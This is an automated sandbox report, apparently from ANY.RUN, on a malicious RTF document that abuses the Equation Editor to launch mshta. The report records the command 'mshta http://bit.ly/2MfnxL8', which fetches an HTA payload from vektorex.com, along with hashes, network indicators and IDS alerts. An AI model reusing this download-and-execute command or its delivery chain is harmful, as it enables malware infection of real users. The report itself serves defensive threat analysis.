File name: | Signed Documents .doc |
Full analysis: | https://app.any.run/tasks/7253a5e2-d635-49a6-9c94-4e5b2aa3b5d9 |
Verdict: | Malicious activity |
Analysis date: | January 18, 2019, 08:30:18 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 492AABCDFBE3DDAC389B7B02B95643FC |
SHA1: | D4CE96EBA78AC8E1FEF6E9C3DB6E8EDF247ABAFD |
SHA256: | 89FE5389B465EAB3C16A92166BCAB9D70531B8464C618DE9743F1075524839EC |
SSDEEP: | 1536:IV4l+lyxKalriYC8tGxdHoP13Gm+xaA2F+gvhkbXLjcuMs/LzV:I+l8kKwriYC8o |
.rtf | | | Rich Text Format (100) |
---|
LastModifiedBy: | - |
---|---|
Author: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3004 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Signed Documents .doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3508 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
296 | mshta http://bit.ly/2MfnxL8 &AAAAAAAAAAAAAAAC | C:\Windows\system32\mshta.exe | EQNEDT32.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3004 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREB10.tmp.cvr | — | |
MD5:— | SHA256:— | |||
296 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txt | text | |
MD5:3A9BAE14A1D8B6D9F8A93BBEA0934B74 | SHA256:E67D48A879D263A81565BB9FE4B1E3C2114DF2D3495401A893CF7C211989A5D2 | |||
3004 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:7261EB6FD62F078A859E03E917B42E56 | SHA256:656F7759AC706C7C9308FF39822D7803301642B802B62137D84D6A0F924D316C | |||
3004 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$gned Documents .doc | pgc | |
MD5:92359342B85C10D28A5BD7860B965E4F | SHA256:E450C7AD196E93E339EA1F01160CD126D69FFAE2CDD29FF3B80CBB3DF84A9930 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
296 | mshta.exe | GET | 301 | 67.199.248.10:80 | http://bit.ly/2MfnxL8 | US | html | 129 b | shared |
296 | mshta.exe | GET | 404 | 94.73.146.167:80 | http://vektorex.com/cgii/kass934Report.hta | TR | html | 657 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
296 | mshta.exe | 67.199.248.10:80 | bit.ly | Bitly Inc | US | shared |
296 | mshta.exe | 94.73.146.167:80 | vektorex.com | Cizgi Telekomunikasyon Anonim Sirketi | TR | malicious |
Domain | IP | Reputation |
---|---|---|
bit.ly |
| shared |
vektorex.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
296 | mshta.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell.Downloader httpHeader |
296 | mshta.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTA application download |
296 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
296 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
296 | mshta.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious downloader - bit.ly redirect to .hta object |
296 | mshta.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious downloader - redirect to .hta object |